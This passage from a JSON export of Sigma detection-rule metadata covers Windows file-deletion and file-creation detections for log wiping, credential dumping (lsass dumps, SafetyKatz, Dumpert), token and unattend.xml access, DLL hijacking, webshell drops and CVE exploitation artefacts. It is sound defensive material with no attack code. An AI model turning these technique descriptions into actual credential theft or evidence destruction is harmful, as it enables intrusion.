History logs which may indicate an attempt to destroy forensic evidence", - "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "value": "Exchange PowerShell Cmdlet History Deleted", - "meta": { - "refs": [ - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/10/26", - "filename": "file_delete_win_exchange_powershell_logs.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Possible FP during log rotation" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", - "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", - "value": "Sysinternals SDelete File Deletion", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/9", - "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2020/05/02", - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "medium", - "falsepositive": [ - "Legitime usage of SDelete" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", - "value": "Unusual File Deletion by dns.exe", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1133" - ], - "creation_date": "2022/09/27", - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", - "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", - "value": "WebServer Access Logs Deleted", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "creation_date": "2022/09/16", - "filename": "file_delete_win_webserver_access_logs_deleted.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "During uninstallation of the IIS service", - "During log rotation" - ], - "logsource.category": "file_delete", - "logsource.product": "windows" - } - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "value": "Suspicious File Event With Teams Objects", - "meta": { - "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ], - "creation_date": "2022/09/16", - "filename": "file_event_win_access_susp_teams.yml", - "author": "@SerkinValery", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", - "value": "Suspicious Unattend.xml File Access", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2021/12/19", - "filename": "file_event_win_access_susp_unattend_xml.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", - "value": "Advanced IP Scanner - File Event", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2020/05/12", - "filename": "file_event_win_advanced_ip_scanner.yml", - "author": "@ROxPinTeddy", - "level": "medium", - "falsepositive": [ - "Legitimate administrative use" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", - "value": "Anydesk Temporary Artefact", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/11", - "filename": "file_event_win_anydesk_artefact.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "value": "Suspicious Binary Writes Via AnyDesk", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/09/28", - "filename": "file_event_win_anydesk_writing_susp_binaries.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", - "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "value": "Unidentified Attacker November 2018 - File", - "meta": { - "refs": [ - "https://twitter.com/DrunkBinary/status/1063075530180886529", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_unidentified_nov_18.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218.011" - ], - "creation_date": "2018/11/20", - "filename": "file_event_win_apt_unidentified_nov_18.yml", - "author": "@41thexplorer, Microsoft Defender ATP", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "value": "BloodHound Collection Files", - "meta": { - "refs": [ - "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/08/09", - "filename": "file_event_win_bloodhound_collection.yml", - "author": "C.J. May", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "value": "CrackMapExec File Creation Patterns", - "meta": { - "refs": [ - "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/03/12", - "filename": "file_event_win_crackmapexec_patterns.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", - "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", - "value": "Creation Of Non-Existent DLLs In System Folders", - "meta": { - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], - "creation_date": "2022/12/01", - "filename": "file_event_win_create_non_existent_dlls.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", - "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", - "value": "New Shim Database Created in the Default Directory", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ], - "creation_date": "2021/12/29", - "filename": "file_event_win_creation_new_shim_database.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", - "value": "Suspicious Screensaver Binary File Creation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.002" - ], - "creation_date": "2021/12/29", - "filename": "file_event_win_creation_scr_binary_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", - "value": "Files With System Process Name In Unsuspected Locations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2020/05/26", - "filename": "file_event_win_creation_system_file.yml", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", - "value": "Creation Exe for Service with Unquoted Path", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ], - "creation_date": "2021/12/30", - "filename": "file_event_win_creation_unquoted_service_path.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "value": "Cred Dump Tools Dropped Files", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], - "creation_date": "2019/11/01", - "filename": "file_event_win_cred_dump_tools_dropped_files.yml", - "author": "Teymur Kheirkhabarov, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "value": "WScript or CScript Dropper - File", - "meta": { - "refs": [ - "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/10", - "filename": "file_event_win_cscript_wscript_dropper.yml", - "author": "Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", - "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", - "value": "Dynamic C Sharp Compile Artefact", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], - "creation_date": "2022/01/09", - "filename": "file_event_win_csharp_compile_artefact.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "meta": { - "refs": [ - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://github.com/cube0x0/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" - ], - "creation_date": "2021/06/29", - "filename": "file_event_win_cve_2021_1675_printspooler.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server\u2019s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", - "value": "CVE-2021-26858 Exchange Exploitation", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_26858_msexchange.yml" - ], - "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" - ], - "creation_date": "2021/03/03", - "filename": "file_event_win_cve_2021_26858_msexchange.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" - ], - "creation_date": "2021/07/16", - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", - "author": "Sittikorn S", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "meta": { - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/11/22", - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", - "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", - "value": "CVE-2021-44077 POC Default Dropped File", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", - "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" - ], - "tags": [ - "attack.execution", - "cve.2021.44077" - ], - "creation_date": "2022/06/06", - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "value": "CVE-2022-24527 Microsoft Connected Cache LPE", - "meta": { - "refs": [ - "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" - ], - "creation_date": "2022/04/13", - "filename": "file_event_win_cve_2022_24527_lpe.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "value": "Powerup Write Hijack DLL", - "meta": { - "refs": [ - "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_detect_powerup_dllhijacking.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" - ], - "creation_date": "2021/08/21", - "filename": "file_event_win_detect_powerup_dllhijacking.yml", - "author": "Subhash Popuri (@pbssubhash)", - "level": "high", - "falsepositive": [ - "Any powershell script that creates bat files" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", - "value": "DLL Search Order Hijackig Via Additional Space in Path", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1552932770464292864", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2022/07/30", - "filename": "file_event_win_dll_sideloading_space_path.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", - "uuid": "15904280-565c-4b73-9303-3291f964e7f9", - "value": "Persistence Via ErrorHandler.Cmd", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", - "https://github.com/last-byte/PersistenceSniper", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/09", - "filename": "file_event_win_error_handler_cmd_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "value": "Suspicious ASPX File Drop by Exchange", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2022/10/01", - "filename": "file_event_win_exchange_webshell_drop.yml", - "author": "Florian Roth (rule), MSTI (query, idea)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious file type dropped by an Exchange component in IIS", - "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", - "value": "Suspicious File Drop by Exchange", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", - "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1190", - "attack.initial_access", - "attack.t1505.003" - ], - "creation_date": "2022/10/04", - "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects default lsass dump filename from SafetyKatz", - "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", - "value": "SafetyKatz Default Dump Filename", - "meta": { - "refs": [ - "https://github.com/GhostPack/SafetyKatz", - "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2018/07/24", - "filename": "file_event_win_ghostpack_safetykatz.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Rare legitimate files with similar filename structure" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", - "value": "GoToAssist Temporary Installation Artefact", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/13", - "filename": "file_event_win_gotoopener_artefact.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "file_event", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", - "value": "Dumpert Process Dumper Default File", - "meta": { - "refs": [ - "https://github.com/outflanknl/Dumpert", - "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/02/04", - "filename": "file_event_win_hack_dumpert.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Very unlikely" - ], - "logsource.category": "file_event", - 